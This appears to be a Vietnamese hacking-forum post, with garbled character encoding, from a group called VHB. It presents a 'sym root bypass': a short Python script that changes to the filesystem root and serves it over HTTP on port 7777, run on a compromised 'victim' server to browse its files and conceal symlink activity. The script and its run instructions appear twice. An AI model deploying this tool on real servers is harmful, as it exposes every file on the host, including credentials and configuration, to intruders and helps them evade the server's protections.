�?u ti�n m?i ng�?i c� th? ki?m tra xem c� g�i python �c c�i tr�n server ch�a
d�ng l?nh python -h xem c� tr? v? k?t qu? g? ko n�.
N?u c� ch?y th? t?o �o?n code python sau l�u v�o file capuchino.py
Sau �� ch?y n� python capuchino.py
r?i ki?m tra k?t qu? :victim:7777
C�ch n�y c� th? gi?u �c k?t qu? th?c hi?n sym tr�n server
Capuchino - VHB Group
d�ng l?nh python -h xem c� tr? v? k?t qu? g? ko n�.
N?u c� ch?y th? t?o �o?n code python sau l�u v�o file capuchino.py
#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()
Sau �� ch?y n� python capuchino.py
r?i ki?m tra k?t qu? :victim:7777
C�ch n�y c� th? gi?u �c k?t qu? th?c hi?n sym tr�n server
Capuchino - VHB Group
Sym root bypass open port n?u server cho ch?y python
4/
5
Oleh
Unknown